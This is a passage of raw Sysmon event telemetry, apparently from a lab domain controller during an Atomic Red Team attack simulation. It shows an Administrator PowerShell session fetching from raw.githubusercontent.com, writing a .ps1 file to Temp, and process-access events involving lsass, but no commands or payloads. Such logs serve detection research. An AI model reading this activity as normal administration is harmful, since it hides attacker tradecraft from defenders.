C:\Users\ADMINI~1\AppData\Local\Temp\2\ATTACKRANGE\Administrator{05ADC7E1-29F1-6039-B11D-350000000000}0x351db12HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{05ADC7E1-7049-603D-4188-00000000AD01}5784C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" 11241100x80000000000000001695513Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:27.633{05ADC7E1-7049-603D-4188-00000000AD01}5784C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\art-err.txt2021-03-01 22:53:21.483 11241100x80000000000000001695512Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:27.633{05ADC7E1-7049-603D-4188-00000000AD01}5784C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\art-out.txt2021-03-01 22:53:21.480 23542300x80000000000000001695511Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:27.582{05ADC7E1-7049-603D-4188-00000000AD01}5784ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\2\art-err.txtMD5=7D454EE6242CE1E582CB393852104CF3,SHA256=D9E9EAEAB30B0E1D482AD5EB65F90A6BA0F83AC70FBF354976FCDF661B07A4BD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001695510Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:27.551{05ADC7E1-7049-603D-4188-00000000AD01}5784ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\2\art-out.txtMD5=3857640AB8C6D106BA278B5267D3E409,SHA256=4ADF202E7A51B5CFC70BBBBB45FF4FDE2F919D7DA89F9A381817FD682671454F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001695509Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:27.504{05ADC7E1-7062-603D-5288-00000000AD01}6908ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveMD5=446DD1CF97EABA21CF14D03AEBC79F27,SHA256=A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001695535Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:28.732{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9A988164F11E22111140AEFB6B48D412,SHA256=71BF5B7B1761274698528FD77C3CE0EE2B2EE50437A183A715EB742F525DE053,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001695534Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:28.551{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=65138D1F71C7AAE78B70352FDD973528,SHA256=81C040B9EA166FAD42A270A49E1A3DF54736FFF836D3E29AC04E361E224A0174,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001695533Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:28.533{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=54F1A519FCFE589DB79473F6AB789156,SHA256=5B1DB45D21DFF985FA296E34C8AD78C9E8FCEDC31FD1BE165DA8E274572676D2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001695539Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:29.786{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=46AE746F105DB0A3E5694FD62FBDD440,SHA256=D09DA517D6633E393905DC4114DB63A9563CA421B589873420B292DE7016DFBE,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001695538Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:21.276{05ADC7E1-7067-603D-5388-00000000AD01}6264C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-974.attackrange.local55117-false185.199.110.133cdn-185-199-110-133.github.com443https 10341000x80000000000000001695537Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:29.786{05ADC7E1-22AF-6039-2800-00000000AD01}19363196C:\Windows\sysmon64.exe{05ADC7E1-7067-603D-5388-00000000AD01}6264C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ntdll.dll+6cdaa|C:\Windows\System32\KERNEL32.DLL+1cff8|C:\Windows\System32\KERNEL32.DLL+25a87|C:\Windows\sysmon64.exe+14ced|C:\Windows\sysmon64.exe+15adb|C:\Windows\sysmon64.exe+16c29|C:\Windows\sysmon64.exe+1abb1|C:\Windows\sysmon64.exe+1cfc7|C:\Windows\sysmon64.exe+1d392|C:\Windows\sysmon64.exe+1d4a5|C:\Windows\sysmon64.exe+b0519|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001695536Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:29.786{05ADC7E1-22AF-6039-2800-00000000AD01}19363196C:\Windows\sysmon64.exe{05ADC7E1-7067-603D-5388-00000000AD01}6264C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\sysmon64.exe+2682c|C:\Windows\sysmon64.exe+1cc6d|C:\Windows\sysmon64.exe+1d392|C:\Windows\sysmon64.exe+1d4a5|C:\Windows\sysmon64.exe+b0519|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000001695542Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:30.801{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2486A7927DB5E5BBDCD59D3AE29A457A,SHA256=C91A3809CB79D4A9795F6C77503D5F3B54F30715AD3E6E671F22035C202DF283,IMPHASH=00000000000000000000000000000000falsetrue 22542200x80000000000000001695541Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:21.275{05ADC7E1-7067-603D-5388-00000000AD01}6264raw.githubusercontent.com0::ffff:185.199.110.133;::ffff:185.199.111.133;::ffff:185.199.108.133;::ffff:185.199.109.133;C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 10341000x80000000000000001695540Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:30.098{05ADC7E1-22AF-6039-2800-00000000AD01}19363212C:\Windows\sysmon64.exe{05ADC7E1-7067-603D-5388-00000000AD01}6264C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ntdll.dll+6cdaa|C:\Windows\System32\KERNEL32.DLL+1cff8|C:\Windows\System32\KERNEL32.DLL+25a87|C:\Windows\sysmon64.exe+14ced|C:\Windows\sysmon64.exe+15adb|C:\Windows\sysmon64.exe+16495|C:\Windows\sysmon64.exe+16778|C:\Windows\sysmon64.exe+16aae|C:\Windows\sysmon64.exe+1a5ae|C:\Windows\sysmon64.exe+5ea0|C:\Windows\sysmon64.exe+6037|C:\Windows\System32\sechost.dll+10a75|C:\Windows\System32\sechost.dll+1004d|C:\Windows\System32\sechost.dll+fe55|C:\Windows\System32\sechost.dll+ed3f|C:\Windows\sysmon64.exe+6213|C:\Windows\sysmon64.exe+b0519|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 354300x80000000000000001695545Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:23.548{05ADC7E1-FB27-603C-8779-00000000AD01}2272C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-974.attackrange.local55118-false10.0.1.12-8000- 23542300x80000000000000001695544Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:31.801{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=01D80276902B7827AB046D3E8AD37855,SHA256=37F56D376AC272C55BC625577CC49A6502B43C9021EF33219F6DA1AD78F9802D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001695543Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:31.207{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=3493077D2E73483091E3A8182AB56545,SHA256=EF306CB84B0C249DB07A6DD69D0E01E1FAA174A39077667E4BC38B754BEFD769,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001695549Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:32.933{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=43821A5FC57BC70FE1AC54B2254B46F3,SHA256=033C78A90454181729B6634DFA1DE691B785BB95A14FA5D5FEACF233183539E1,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001695548Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:24.189{05ADC7E1-229D-6039-0B00-00000000AD01}852C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetrue0:0:0:0:0:0:0:1win-dc-974.attackrange.local55119-true0:0:0:0:0:0:0:1win-dc-974.attackrange.local389ldap 354300x80000000000000001695547Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:24.189{05ADC7E1-22AF-6039-2E00-00000000AD01}2684C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exeNT AUTHORITY\SYSTEMtcptruetrue0:0:0:0:0:0:0:1win-dc-974.attackrange.local55119-true0:0:0:0:0:0:0:1win-dc-974.attackrange.local389ldap 23542300x80000000000000001695546Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:32.820{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=44C1B78DB2B4D643F05103102A7F0DEB,SHA256=F975B4F15CE751B21DB42E4F4D143D40A672D4A5200E5E0B5E6D4E5F494F0715,IMPHASH=00000000000000000000000000000000falsetrue 11241100x80000000000000001695573Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:33.433{05ADC7E1-706D-603D-5488-00000000AD01}7076C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\2\Default_File_Path.ps12021-03-01 22:53:33.433 10341000x80000000000000001695572Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:33.348{05ADC7E1-229F-6039-1600-00000000AD01}15407628C:\Windows\system32\svchost.exe{05ADC7E1-706D-603D-5488-00000000AD01}7076C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001695571Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:33.348{05ADC7E1-229F-6039-1600-00000000AD01}15401572C:\Windows\system32\svchost.exe{05ADC7E1-706D-603D-5488-00000000AD01}7076C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001695570Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:33.301{05ADC7E1-229D-6039-0B00-00000000AD01}8525640C:\Windows\system32\lsass.exe{05ADC7E1-706D-603D-5488-00000000AD01}7076C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001695569Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:33.301{05ADC7E1-229D-6039-0B00-00000000AD01}8525640C:\Windows\system32\lsass.exe{05ADC7E1-706D-603D-5488-00000000AD01}7076C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 17141700x80000000000000001695568Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-CreatePipe2021-03-01 22:53:33.270{05ADC7E1-706D-603D-5488-00000000AD01}7076\PSHost.132591128131883348.7076.DefaultAppDomain.powershellC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 23542300x80000000000000001695567Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:33.254{05ADC7E1-706D-603D-5488-00000000AD01}7076ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\2\__PSScriptPolicyTest_phkwhov0.oym.psm1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001695566Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:33.254{05ADC7E1-706D-603D-5488-00000000AD01}7076ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\2\__PSScriptPolicyTest_udy5jqqk.egj.ps1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 11241100x80000000000000001695565Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:33.233{05ADC7E1-706D-603D-5488-00000000AD01}7076C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\2\__PSScriptPolicyTest_udy5jqqk.egj.ps12021-03-01 22:53:33.233 10341000x80000000000000001695564Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:33.233{05ADC7E1-229F-6039-0C00-00000000AD01}5887908C:\Windows\system32\svchost.exe{05ADC7E1-706D-603D-5488-00000000AD01}7076C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001695563Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:33.192{05ADC7E1-7049-603D-4288-00000000AD01}62085740C:\Windows\system32\conhost.exe{05ADC7E1-706D-603D-5488-00000000AD01}7076C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001695562Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:33.176{05ADC7E1-7049-603D-4188-00000000AD01}57848908C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{05ADC7E1-706D-603D-5488-00000000AD01}7076C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1f3fffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+3364bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b3a5c|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b42a7|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b452d|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b3ed3|UNKNOWN(00007FF829C38813) 10341000x80000000000000001695561Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:33.176{05ADC7E1-229F-6039-0C00-00000000AD01}5887908C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001695560Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:33.176{05ADC7E1-229F-6039-0C00-00000000AD01}5887908C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001695559Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:33.176{05ADC7E1-229F-6039-0C00-00000000AD01}5887908C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001695558Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:33.176{05ADC7E1-229F-6039-0C00-00000000AD01}5887908C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001695557Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:33.176{05ADC7E1-29F0-6039-C005-00000000AD01}49441064C:\Windows\system32\csrss.exe{05ADC7E1-706D-603D-5488-00000000AD01}7076C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000001695556Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:33.176{05ADC7E1-7049-603D-4188-00000000AD01}57848908C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{05ADC7E1-706D-603D-5488-00000000AD01}7076C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\cfd860010e09697c026b70ae44e2d030\Microsoft.PowerShell.Commands.Management.ni.dll+23151500(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\cfd860010e09697c026b70ae44e2d030\Microsoft.PowerShell.Commands.Management.ni.dll+23151500(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\cfd860010e09697c026b70ae44e2d030\Microsoft.PowerShell.Commands.Management.ni.dll+23151500(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\cfd860010e09697c026b70ae44e2d030\Microsoft.PowerShell.Commands.Management.ni.dll+23151500(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6fbf37b8(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6fbf362c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6fc75e58(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6fbec214(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+706a5407(wow64)|C:\